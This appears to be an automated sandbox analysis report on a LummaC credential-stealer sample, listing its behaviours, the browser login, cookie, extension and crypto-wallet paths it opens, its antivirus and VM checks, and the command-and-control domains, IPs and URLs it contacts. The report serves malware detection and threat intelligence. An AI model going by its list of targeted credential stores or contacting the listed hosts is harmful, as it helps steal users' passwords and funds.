Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\setup.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: setup.exe PID: 3844, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Searches for user specific document files
Source: C:\Users\user\Desktop\setup.exe Directory queried: C:\Users\user\Documents\UOOJJOZIRH Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Directory queried: C:\Users\user\Documents\UOOJJOZIRH Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000000.00000003.1944862906.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: setup.exe PID: 3844, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: setup.exe PID: 3844, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579284 Sample: setup.exe Startdate: 21/12/2024 Architecture: WINDOWS Score: 100 16 principledjs.click 2->16 18 kliptizq.shop 2->18 24 Suricata IDS alerts for network traffic 2->24 26 Found malware configuration 2->26 28 Malicious sample detected (through community Yara rule) 2->28 30 7 other signatures 2->30 8 setup.exe 2->8         started        signatures3 process4 dnsIp5 20 principledjs.click 172.67.187.214, 443, 49730, 49731 CLOUDFLARENETUS United States 8->20 22 kliptizq.shop 172.67.191.144, 443, 49744 CLOUDFLARENETUS United States 8->22 32 Suspicious powershell command line found 8->32 34 Query firmware table information (likely to detect VMs) 8->34 36 Tries to harvest and steal ftp login credentials 8->36 38 2 other signatures 8->38 12 powershell.exe 7 8->12         started        signatures6 process7 process8 14 conhost.exe 12->14         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.67.187.214
 principledjs.click United States
13335 CLOUDFLARENETUS true
172.67.191.144
 kliptizq.shop United States
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
principledjs.click 172.67.187.214 true
kliptizq.shop 172.67.191.144 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://principledjs.click/api true
    		unknown
    necklacebudi.lat false
      		high
      aspecteirs.lat false
        		high
        sustainskelet.lat false
          		high
          crosshuaht.lat false
            		high
            rapeflowwj.lat false
              		high
              principledjs.click true
                		unknown
                energyaffai.lat false
                  		high
                  https://kliptizq.shop/int_clp_ldr_sha.txt false
                    		unknown
                    grannyejh.lat false
                      		high
                      discokeyus.lat false
                        		high